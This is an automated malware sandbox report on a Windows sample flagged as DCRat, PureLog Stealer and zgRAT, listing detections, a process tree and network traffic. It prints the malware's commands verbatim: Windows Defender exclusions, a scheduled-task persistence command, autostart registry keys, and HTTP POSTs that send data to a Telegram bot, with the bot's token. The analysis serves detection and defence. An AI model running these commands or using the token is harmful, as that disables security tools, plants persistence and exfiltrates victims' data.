
Windows Analysis Report
LzmJLVB41K.exe

Overview

General Information

Sample name: LzmJLVB41K.exe (renamed because original name is a hash value)
Original sample name: 2d756772bc00e5778d794c107358ddf7.exe
Analysis ID: 1557447
MD5: 2d756772bc00e5778d794c107358ddf7
SHA1: 77229fc9ceeb137c6644a4fa3085aecabaf94ec3
SHA256: a7f4c48301ad6b01c8777427eaceb965a9e0c14d493f44d1dea4f8d498123469
Tags: DCRat, exe, user-abuse_ch

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops executables to the windows directory (C:\Windows) and starts them
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • LzmJLVB41K.exe (PID: 2016 cmdline: "C:\Users\user\Desktop\LzmJLVB41K.exe" MD5: 2D756772BC00E5778D794C107358DDF7)
    • schtasks.exe (PID: 2664 cmdline: schtasks.exe /create /tn "fozAQGvSmfTQIywuzSgkf" /sc MINUTE /mo 8 /tr "'C:\Recovery\fozAQGvSmfTQIywuzSgk.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • csc.exe (PID: 3816 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4zgfavxt\4zgfavxt.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 4600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 6492 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6584.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC80740084700441B098BDC166533478DB.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • csc.exe (PID: 2300 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a4ouxeif\a4ouxeif.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 6520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 3984 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6A18.tmp" "c:\Windows\System32\CSC7E7B7A5EED54F4581A1AD8A9D40FA45.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • powershell.exe (PID: 4780 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\fozAQGvSmfTQIywuzSgk.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 8044 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 1588 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ctfmon.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5896 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\SciTE\api\fozAQGvSmfTQIywuzSgk.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2664 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4368 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7180 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\LzmJLVB41K.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7408 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Kg1DnkFEGg.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7652 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 7740 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
      • fontdrvhost.exe (PID: 2632 cmdline: "C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe" MD5: 2D756772BC00E5778D794C107358DDF7)
  • fozAQGvSmfTQIywuzSgk.exe (PID: 3648 cmdline: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe MD5: 2D756772BC00E5778D794C107358DDF7)
  • fozAQGvSmfTQIywuzSgk.exe (PID: 3192 cmdline: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe MD5: 2D756772BC00E5778D794C107358DDF7)
  • ctfmon.exe (PID: 1220 cmdline: C:\Recovery\ctfmon.exe MD5: 2D756772BC00E5778D794C107358DDF7)
  • ctfmon.exe (PID: 3172 cmdline: C:\Recovery\ctfmon.exe MD5: 2D756772BC00E5778D794C107358DDF7)
  • fontdrvhost.exe (PID: 3984 cmdline: "C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe" MD5: 2D756772BC00E5778D794C107358DDF7)
  • fontdrvhost.exe (PID: 1268 cmdline: "C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe" MD5: 2D756772BC00E5778D794C107358DDF7)
  • LzmJLVB41K.exe (PID: 432 cmdline: C:\Users\user\Desktop\LzmJLVB41K.exe MD5: 2D756772BC00E5778D794C107358DDF7)
  • LzmJLVB41K.exe (PID: 4372 cmdline: C:\Users\user\Desktop\LzmJLVB41K.exe MD5: 2D756772BC00E5778D794C107358DDF7)
  • fozAQGvSmfTQIywuzSgk.exe (PID: 7884 cmdline: "C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe" MD5: 2D756772BC00E5778D794C107358DDF7)
  • ctfmon.exe (PID: 7020 cmdline: "C:\Recovery\ctfmon.exe" MD5: 2D756772BC00E5778D794C107358DDF7)
  • cleanup
No configs have been found
Source | Rule | Description | Author
LzmJLVB41K.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
LzmJLVB41K.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security

Source | Rule | Description | Author
C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
C:\Recovery\ctfmon.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
C:\Recovery\ctfmon.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
C:\Program Files (x86)\AutoIt3\SciTE\api\fozAQGvSmfTQIywuzSgk.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security

Source | Rule | Description | Author
00000000.00000000.2160562752.00000000009E2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000000.00000002.2376236746.00000000130C6000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
Process Memory Space: LzmJLVB41K.exe PID: 2016 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
Process Memory Space: fozAQGvSmfTQIywuzSgk.exe PID: 7884 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security

Source | Rule | Description | Author
0.0.LzmJLVB41K.exe.9e0000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
0.0.LzmJLVB41K.exe.9e0000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security

                            System Summary

Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\Desktop\LzmJLVB41K.exe, ProcessId: 2016, TargetFilename: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\fozAQGvSmfTQIywuzSgk.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\fozAQGvSmfTQIywuzSgk.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\LzmJLVB41K.exe", ParentImage: C:\Users\user\Desktop\LzmJLVB41K.exe, ParentProcessId: 2016, ParentProcessName: LzmJLVB41K.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\fozAQGvSmfTQIywuzSgk.exe', ProcessId: 4780, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\Recovery\fozAQGvSmfTQIywuzSgk.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\LzmJLVB41K.exe, ProcessId: 2016, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fozAQGvSmfTQIywuzSgk
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: explorer.exe, "C:\Recovery\fozAQGvSmfTQIywuzSgk.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\LzmJLVB41K.exe, ProcessId: 2016, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
Source: Process started | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems) | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4zgfavxt\4zgfavxt.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4zgfavxt\4zgfavxt.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\LzmJLVB41K.exe", ParentImage: C:\Users\user\Desktop\LzmJLVB41K.exe, ParentProcessId: 2016, ParentProcessName: LzmJLVB41K.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4zgfavxt\4zgfavxt.cmdline", ProcessId: 3816, ProcessName: csc.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\fozAQGvSmfTQIywuzSgk.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\fozAQGvSmfTQIywuzSgk.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\LzmJLVB41K.exe", ParentImage: C:\Users\user\Desktop\LzmJLVB41K.exe, ParentProcessId: 2016, ParentProcessName: LzmJLVB41K.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\fozAQGvSmfTQIywuzSgk.exe', ProcessId: 4780, ProcessName: powershell.exe
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Users\user\Desktop\LzmJLVB41K.exe, ProcessId: 2016, TargetFilename: C:\Users\user\AppData\Local\Temp\4zgfavxt\4zgfavxt.cmdline
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\fozAQGvSmfTQIywuzSgk.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\fozAQGvSmfTQIywuzSgk.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\LzmJLVB41K.exe", ParentImage: C:\Users\user\Desktop\LzmJLVB41K.exe, ParentProcessId: 2016, ParentProcessName: LzmJLVB41K.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\fozAQGvSmfTQIywuzSgk.exe', ProcessId: 4780, ProcessName: powershell.exe

                            Data Obfuscation

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4zgfavxt\4zgfavxt.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4zgfavxt\4zgfavxt.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\LzmJLVB41K.exe", ParentImage: C:\Users\user\Desktop\LzmJLVB41K.exe, ParentProcessId: 2016, ParentProcessName: LzmJLVB41K.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4zgfavxt\4zgfavxt.cmdline", ProcessId: 3816, ProcessName: csc.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-18T09:17:41.336700+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.6 | 49878 | 37.44.238.250 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-18T09:17:12.477401+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49733 | 34.117.59.81 | 443 | TCP
2024-11-18T09:18:14.875621+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49991 | 34.117.59.81 | 443 | TCP

                            AV Detection

Source: LzmJLVB41K.exe | Avira: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\api\fozAQGvSmfTQIywuzSgk.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\AutoIt3\SciTE\api\fozAQGvSmfTQIywuzSgk.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Recovery\ctfmon.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\Kg1DnkFEGg.bat | Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files (x86)\AutoIt3\SciTE\api\fozAQGvSmfTQIywuzSgk.exe | ReversingLabs: Detection: 65%
Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe | ReversingLabs: Detection: 65%
Source: C:\Recovery\ctfmon.exe | ReversingLabs: Detection: 65%
Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe | ReversingLabs: Detection: 65%
Source: C:\Users\user\Desktop\KlfRTWYv.log | ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\QMBYhgjh.log | ReversingLabs: Detection: 23%
Source: C:\Users\user\Desktop\zxBbjKdN.log | ReversingLabs: Detection: 50%
Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe | ReversingLabs: Detection: 65%
Source: LzmJLVB41K.exe | ReversingLabs: Detection: 65%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Program Files (x86)\AutoIt3\SciTE\api\fozAQGvSmfTQIywuzSgk.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\api\fozAQGvSmfTQIywuzSgk.exe | Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe | Joe Sandbox ML: detected
Source: C:\Recovery\ctfmon.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Joe Sandbox ML: detected
Source: LzmJLVB41K.exe | Joe Sandbox ML: detected
Source: LzmJLVB41K.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Directory created: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Directory created: C:\Program Files\Microsoft Office 15\ClientX64\5b884080fd4f94
Source: unknown | HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.6:49726 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49739 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.6:49990 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49993 version: TLS 1.2
Source: LzmJLVB41K.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: :C:\Users\user\AppData\Local\Temp\4zgfavxt\4zgfavxt.pdb | source: LzmJLVB41K.exe, 00000000.00000002.2317415520.00000000036D9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\a4ouxeif\a4ouxeif.pdb | source: LzmJLVB41K.exe, 00000000.00000002.2317415520.00000000036D9000.00000004.00000800.00020000.00000000.sdmp

                            Spreading

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | File opened: C:\Users\user
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | File opened: C:\Users\user\AppData\Local\Temp

                            Networking

Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.6:49878 -> 37.44.238.250:80
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 Host: ipinfo.io Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /country HTTP/1.1 Host: ipinfo.io
Source: global traffic | HTTP traffic detected: POST /bot7520842495:AAGp6iR-yxPgcux3oLWODyICGAWeVDY-0VQ/sendPhoto HTTP/1.1 Content-Type: multipart/form-data; boundary="5911ef4b-6830-488b-9b69-d419e32ff926" Host: api.telegram.org Content-Length: 100534 Expect: 100-continue Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 Host: ipinfo.io Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /country HTTP/1.1 Host: ipinfo.io
Source: global traffic | HTTP traffic detected: POST /bot7520842495:AAGp6iR-yxPgcux3oLWODyICGAWeVDY-0VQ/sendPhoto HTTP/1.1 Content-Type: multipart/form-data; boundary="e2171771-5cfd-4b96-afc0-02258389f03e" Host: api.telegram.org Content-Length: 103439 Expect: 100-continue Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View | IP Address: 34.117.59.81 34.117.59.81
Source: Joe Sandbox View | IP Address: 34.117.59.81 34.117.59.81
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: ipinfo.io
Source: unknown | DNS query: name: ipinfo.io
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49733 -> 34.117.59.81:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49991 -> 34.117.59.81:443
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 Host: ipinfo.io Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /country HTTP/1.1 Host: ipinfo.io
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 Host: ipinfo.io Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /country HTTP/1.1 Host: ipinfo.io
Source: global traffic | DNS traffic detected: DNS query: ipinfo.io
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: unknown | HTTP traffic detected: POST /bot7520842495:AAGp6iR-yxPgcux3oLWODyICGAWeVDY-0VQ/sendPhoto HTTP/1.1 Content-Type: multipart/form-data; boundary="5911ef4b-6830-488b-9b69-d419e32ff926" Host: api.telegram.org Content-Length: 100534 Expect: 100-continue Connection: Keep-Alive
Source: LzmJLVB41K.exe, 00000000.00000002.2317415520.000000000342E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
Source: LzmJLVB41K.exe, 00000000.00000002.2317415520.00000000037CD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ipinfo.io
Source: powershell.exe, 00000022.00000002.3739159881.00000164728F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.3723381092.0000024128057000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.3741199181.00000277462C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.3637871775.0000019BBDC77000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.3722297337.000001E46C287000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000002B.00000002.2446559445.000001E45C462000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000022.00000002.2447636860.0000016462AA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2450393544.0000019B544F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2439053732.0000024118207000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2438216761.0000027736478000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2433495607.0000019BADE29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2446559445.000001E45C462000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: LzmJLVB41K.exe, 00000000.00000002.2317415520.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, LzmJLVB41K.exe, 00000000.00000002.2317415520.00000000031BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2450393544.0000019B542D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2439053732.0000024117FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2438216761.0000027736251000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2433495607.0000019BADC01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2446559445.000001E45C211000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000022.00000002.2447636860.0000016462881000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameP
Source: powershell.exe, 00000022.00000002.2447636860.0000016462AA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2450393544.0000019B544F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2439053732.0000024118207000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2438216761.0000027736478000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2433495607.0000019BADE29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2446559445.000001E45C462000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000002B.00000002.2446559445.000001E45C462000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
